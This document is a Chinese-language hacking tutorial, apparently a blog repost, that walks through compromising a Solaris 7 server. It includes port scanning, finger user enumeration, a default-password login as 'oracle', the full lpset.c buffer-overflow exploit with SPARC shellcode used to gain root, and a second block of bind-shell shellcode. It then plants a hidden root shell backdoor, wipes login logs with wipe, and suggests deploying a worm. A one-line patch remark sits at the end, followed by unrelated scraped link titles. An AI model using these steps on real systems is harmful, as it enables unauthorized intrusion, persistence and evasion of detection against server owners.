今天我想给大家介绍的是Sunos 。 Sunos是一个非常好的Unix操作系统,功能强大。很多大型公司都采用此系统作为服务器系统。(例如:sina、163等。)至于它的漏洞,也是多不胜数的了。今天我就介绍一下这个系统的漏洞。

Unix:Unix操作系统自70年代由贝尔实验室推出以来,80年代经过大学、研究所、工业实验室的应用和发展,现已成为全球各大学、研究所及工业研究室、计算机网络通信、工作站系统的主流工具,并开始进入商业市场和个人电脑领域。尤其是美国在1994年率先提出信息高速公路(Information Super Highway)的构想,更UNIX的发展应用推波助澜。到目前为止UNIX用户已经达到200万户,其成长速度之惊人,前所未有。UNIX提供多用户、多任务的操作环境,其网络工具使计算机远程通信、并行处理、资源分配等有了更广阔的应用前景。尤其是它的X Window系统函盖了传统的DOS命令行和视窗系统的优点。

 

Solaris与Sunos的版本转换:

Solaris 8 = Sunos 5.8,Solaris 7 = Sunos 5.7,Solaris 2.6 = Sunos 5.6,Solaris 2.5 = Sunos 5.5……

因为自Sunos 5以后,就叫Solaris了。

Solaris也有分服务器版和个人版,它们分别是:

服务器版:sparc

个人版:x86

通常个人是不会安装Solaris的。

Solaris主要的漏洞有:

远程漏洞:

RPC:

rpc.ttdbserverd :Solaris 2.3,2.4, 2.5, 2.5.1, 2.6

rpc.cmsd:Solaris 2.5, 2.5.1, 2.6, 7

其他:

sadmind:solaris 2.6, 7

snmpXdmid:Solaris 7, 8

本地漏洞:

lpset:Solaris 2.6,7

本次范例需要的系统及程序情况如下:

操作系统:Window2000

对方操作系统:Sunos 5.7 (solaris 7)

程序(一):lpset.c

程序(二):Superscan 3.0

程序(二):wipe-1.00

本机IP:127.0.0.1

测试IP:127.0.0.17

新程序说明:

“lpset.c”是利用solaris 7和solaris 2.6的/usr/bin/lpset -a 缓冲区溢出漏洞所写的一个exploit。

Solaris 7 lpset -a 缓冲区溢出漏洞

Solaris 2.6和Solaris 7中所带的lpset缺省设置了suid root位,它的一个执行选项"-a"在处
理时存在问题,它会将提供给"-a"的参数不加判断的拷贝到一个固定大小的buffer(900多字节)
中,当用户提供一个包含可执行代码的很长的字符串时,将导致lpset以root身份执行任意命令。
尽管lpset缺省只允许root和sysadm组的用户执行,但是,由于溢出发生在进行执行权限判断操
作之前,任意本地用户都可以利用这个漏洞获取root权限。

wipe-1.00:unix和liunx下,一个非常好用的日志清除程序。

新名词讲解:

肉鸡:已经被***了,具有控制权的主机。

跳板:利用此主机作跳板,***其他主机。

shell:shell是系统与用户的交换式界面。简单来说,就是系统与用户的“沟通”环境。我们平时经常用到的DOS,就是一个shell。(Windows2000是cmd.exe)

root:Unix里最高权限的用户。也就是超级管理员。

admin:Windows NT里最高权限的用户。也就是超级管理员。

rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。

exploit:溢出程序。exploit里通常包含一些shellcode。

shellcode:溢出***要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。

char shellcode[] = "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

这就是一个shellcode。

找一个Unix主机也是一种技巧。

1、首先,我们打开superscan。

设置:

IP:(需要扫描的IP地址。)

Start:127.0.0.1

Stop:127.0.0.255

Scan Type:(扫描类型设置。)

All ports from:23|23

然后,点击“Start”,开始扫描。

2、点击“Prune”,把多余的主机删除。

3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。

小技巧:

........#..'..$:这种响应,通常是Sunos主机的。

..... ..#..':这种响应,通常是liunx的。

假设,我们扫描到:127.0.0.17。

打开,Windows自带的“命令提示符”。

ping 主机:

主要目的是查看主机是否能连接。

D:\>ping 127.0.0.17

Pinging 127.0.0.17 with 32 bytes of data:

Reply from 127.0.0.17: bytes=32 time=191ms TTL=241
Reply from 127.0.0.17: bytes=32 time=170ms TTL=241
Reply from 127.0.0.17: bytes=32 time=160ms TTL=241
Reply from 127.0.0.17: bytes=32 time=170ms TTL=241

Ping statistics for 127.0.0.17:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 160ms, Maximum =  191ms, Average =  172ms

小技巧:

通常 TTL > 200的,都是liunx或者unix系统。

TTL < 200的,都是Windows 9x或Windows NT系统。

telnet主机:

主要看看telnet的banner。

D:\>telnet 127.0.0.17

SunOS 5.7

login:

solaris 7 的。

接着,我用Superscan扫描主机的端口。

方法:

打开superscan。

设置:

IP:

Start:127.0.0.17

Stop:127.0.0.17

Scan Type:(扫描类型设置。)

All ports from:1|65535

然后,点击“Start”,开始扫描。

扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。

* + 211.99.25.1
|___ 7 Echo
|___ 9 Discard
|___ 13 Daytime
|___ 19 Character Generator
|___ 21 File Transfer Protocol [Control]
|___ 23 Telnet
|___ 25 Simple Mail Transfer
|___ 37 Time
|___ 53 Domain Name Server
|___ 79 Finger
|___ 111 SUN Remote Procedure Call
|___ 512 remote process execution;
|___ 513 remote login a la telnet;
|___ 514 cmd
|___ 515 spooler
|___ 540 uucpd

主要的端口有:21、25、53、79、111、513

其他还有:22、80等

端口的主要漏洞:

21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。

22:ssh的端口。例如:SSH 3.0的远程登录漏洞等。

25:sendmail的端口。利用它的漏洞,我们可以D.O.S主机。freebsd的8.8.3版本还可以远程溢出rootshell。

53:DNS的端口。主要漏洞是bind。对于bind 8.2的DNS服务器,我们可以利用exploit溢出一个rootshell。

79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***.***.***.*** 刺探用户。对于,liunx可以 finger @***.***.***.*** 刺探当前在线的用户。

80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。

111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc.statd,Solaris的rpc.ttdbserverd等。

513:rlogin的端口。你可以向主机发送一条:echo '+ +' >/.rhost 如果成功,就可以不用密码rlogin到主机。

finger主机。

目的是利用finger漏洞寻找主机的用户。(取得主机的用户对***主机有很大帮助。)

D:\>finger 0@127.0.0.17

[127.0.0.17]
Login       Name               TTY         Idle    When    Where
daemon          ???                         < .  .  .  . >
bin             ???                         < .  .  .  . >
sys             ???                         < .  .  .  . >
chenhy          ???            pts/7        <Aug  2 15:47> 61.158.255.225
mdevice         ???            897          <Aug  4 17:25> 61.140.253.142
liuy            ???            pts/5        <Aug  2 18:17> 211.101.132.50
oracle          ???            console     6:57 Mon 14:29  :0
oracle          ???            pts/2         4d Mon 14:29  :0.0
oracle          ???            pts/5         22 Sat 16:34  61.140.253.142

D:\>

存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)

oracle,通常oracle的密码就是oracle。

马上试一下!

D:\>telnet 127.0.0.17

SunOS 5.7

login: oracle

Password:

Last login: Sat Aug  4 17:25:49 from 61.140.253.142
Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
$

成功了!

假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。

 

命令:uname -a

查看主机的信息。

$uname -a

SunOS mars 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10

SunOS mars 5.7:SunOS的版本。

sparc:服务器版本。

Generic_106541-08:补丁情况。

 

找到exploit:lpset.c

$cat >lpst.c

/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland        *://lsd-pl.net/ #*/
/*## /usr/bin/lpset                                                          #*/

#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
    char buffer[10000],adr[4],*b;
    int i;

printf("copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/\n");
    printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");

*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;

b=buffer;
    sprintf(b,"***=");
    b+=4;
    for(i=0;i<2;i++) *b++=0xff;
    for(i=0;i<NOPNUM-4;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

execle("/usr/bin/lpset","lsd","-n","xfn","-a",buffer,"printer",0,0);
}
/*                    [url]www.hack.co.za          [/url] [4 August 2000]*/

^D (“^D” = Ctrl+D ,目的是结束。)

 

$cd /tmp

lpset.c放在/tmp目录了。

$ls

lpset.c

建立了。

$gcc -o lpset lpset.c

$

编译程序。

小技巧:Solaris默认是没有gcc的。我们可以用命令“whereis -b gcc”查找。因为管理员通常会在“/usr/local/bin”留下一个gcc的。

命令:chmod 777 lpset

设置程序“lpset”的属性为所有组所有用户都能访问。

$chmod 777 lpset

命令:./lpset

执行程序。

$./lpset
copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/
/usr/bin/lpset for solaris 2.6 2.7 sparc

sh: syntax error at line 1: `(' unexpected
#

命令:id

查看自己的所属的组别。

#id

uid=1035(delex) gid=20(staff) euid=0(root)

“euid=0(root)”取得root权限了。

做个后门:

# mkdir /usr/man/man5/shell

在man文件夹里新建一个文件夹,没那么容易给别人发现。(每台主机的情况都不同。)

# cp /bin/ksh /usr/man/man5/shell

# chmod 777 /usr/man/man5/shell

一个简单的后门就做好了。

以后,我们可以用oracle登陆,然后“./usr/man/man5/shell”取得root权限。

 

用wipe-1.00清除日志。

先把wipe-1.00.tgz上传到主机。

通常ftp的密码与telnet的密码一样。

# gzip -d wipe-1.00.tgz

# tar -xf wipe-1.00.tar

# cd wipe-1.00

# make

Wipe v0.01 !

Usage: 'make ' where System types are:

  linux freebsd sunos4 solaris2 ultrix

  aix irix digital bsdi netbsd hpux

#

其中:

linux freebsd sunos4 solaris2 ultrix

aix irix digital bsdi netbsd hpux

为“选择系统”。

我们这里用“solaris2”。

#make solaris2

gcc -O3 -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c

成功了。

#./wipe
   USAGE: wipe [ u|w|l|a ] ...options...

UTMP editing:
    Erase all usernames      :   wipe u [username]
    Erase one username on tty:   wipe u [username] [tty]

WTMP editing:
   Erase last entry for user :   wipe w [username]
   Erase last entry on tty   :   wipe w [username] [tty]

LASTLOG editing:
   Blank lastlog for user    :   wipe l [username]
   Alter lastlog entry       :   wipe l [username] [tty] [time] [host]
        Where [time] is in the format [YYMMddhhmm]

ACCT editing:
   Erase acct entries on tty :   wipe a [username] [tty]

说明:

u 选项为 utmp utmpx 日志清除。

w 选项为 wtmp wtmpx 日志清除。

l 选项为 lastlog 日志清除。

a 选项为 pacct 日志清除。

方法:./wipe u oracle;./wipe w oracle;./wipe l oracle

#./wipe u oracle;./wipe w oracle;./wipe l oracle

Patching /var/adm/utmp .... Done.

Patching /var/adm/utmpx .... Done.

Patching /var/adm/wtmp .... Done.

Patching /var/adm/wtmpx .... Done.

Patching /var/adm/lastlog .... Done.

其中oracle为刚才登陆的用户名。

小技巧:我们可以用 ./wipe u oracle 隐藏自己。

运行:./wipe u oracle 前

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

oracle    pts/1   下午 20:00        3          w

运行:./wipe u oracle 后

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

最后,我们可以放个worm寻找更多机子。

当然,我们的目的不是为了***。帮主机打上补丁是最好的主意。

解决方法:chmod -s /usr/bin/lpset

转载于:https://blog.51cto.com/userli/68786

『第26天』Sunos (一)相关推荐

  1. 『第27天』Sunos(二)

    本次范例需要的系统及程序情况如下: 操作系统:Window2000 To Sunos 5.8 对方操作系统:Sunos 5.8 程序(一):snmpxdmid.c 本机IP:127.0.0.1 测试I ...

  2. [日推荐] 『无忧育儿说』养育孩子就是这么简单!

    今天小编要推荐一款小程序『无忧育儿说』,因为最近小编周围很多人说不知道怎么养育孩子. 无忧育儿说 无忧育儿说简介:提供2-6岁儿童心智成长课程,汇集首都儿研所等知名机构权威专家内容,让您的孩子真正健康 ...

  3. 『菜鸟手机助手』-做一个属于自己的AppStore-Android助手项目

    『菜鸟手机助手』-做一个属于自己的AppStore-Android助手项目 官方地址:http://www.cniao5.com/course/lessons/10124 注意:更新未完整,更新至41 ...

  4. 20155308『网络对抗技术』Exp7:网络欺诈防范

    20155308『网络对抗技术』Exp7:网络欺诈防范 原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET ...

  5. iOS多线程:『NSOperation、NSOperationQueue』详尽总结

    2019独角兽企业重金招聘Python工程师标准>>> iOS多线程:『NSOperation.NSOperationQueue』详尽总结 转载: 原地址https://www.ji ...

  6. 『Python基础-11』集合 (set)

    # 『Python基础-11』集合 (set) 目录: 集合的基本知识 集合的创建 访问集合里的值 向集合set增加元素 移除集合中的元素 集合set的运算 1. 集合的基本知识 集合(set)是一个 ...

  7. [日推荐]『知乐邀请函』好用的H5制作工具

    2019独角兽企业重金招聘Python工程师标准>>> 今天小编要给大家推荐一款很好用的H5制作小程序. 知乐邀请函 简介:知乐邀请函,在微信小程序中制作流行的H5页面.有官方和设计 ...

  8. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  9. html点击按钮切换图片代码_SVG创意推文—『点击开窗』教程

    嘿,胖友们大家好呀,我是三儿. 好久不见,胖友们有没有想我呀!最近这段时间,各大官媒齐齐出手,朝着SVG创意推文进军.之前人民日报推了一篇<点亮武汉>在当时引起了不小的轰动,三儿也连忙出了 ...

最新文章

  1. How to protect video content (Flash Media Server)
  2. Select For update语句浅析
  3. 30分钟正则表达式入门
  4. Android Studio 内存不足
  5. centos php7 redis,CentOS7 yum快速安装php7.1+nginx+mysql+redis
  6. python获取网站图片_python获取网站图片
  7. win7局域网里输入正确密码也访问不了其他的机器
  8. SpringMVC【一 简单入门例子】
  9. 晶闸管对触发脉冲的要求
  10. Galaxy S III 新广告大片:All Share功能 完败iPhone!
  11. MySQL日志与备份
  12. 每日一道 LeetCode (4):罗马数字转整数
  13. 洛谷P1463 [POI2001][HAOI2007]反素数
  14. 矩阵分析与应用-1.7-逆矩阵
  15. MATLAB与SolidWorks联合仿真(1)
  16. Python含金量较高的证书以及学习困难盘点!
  17. vx2阀(未完待续)
  18. 中国福利彩票,牛B,开奖和数据传输有什么关系?
  19. 炸金花游戏功能的实现(发牌,计算牌型,比牌)——python2.7
  20. 服务器显示四个0,魔兽9.0来了,首日多个服务器爆满,玩家排了4小时也没登上...

热门文章

  1. Unity 编辑器扩展 场景视图内控制对象
  2. [转载]使用RoboCopy 命令
  3. 4G EPS 中建立 UE 与 eNB 之间的 RRC 连接
  4. 开发人员应该对IIS理论层的知识了解的多一些~第四讲 HttpModule中的几大事件
  5. JVM内存状况查看方法和分析工具
  6. 搭建环境_maven: 搭建工程: ssm整合: 搭建测试:
  7. (二)nimlang web开发 hello world jester
  8. js设置滚动条到div底部
  9. 解决https://localhost:1158/em 页面无法打开的问题
  10. Data Set 投票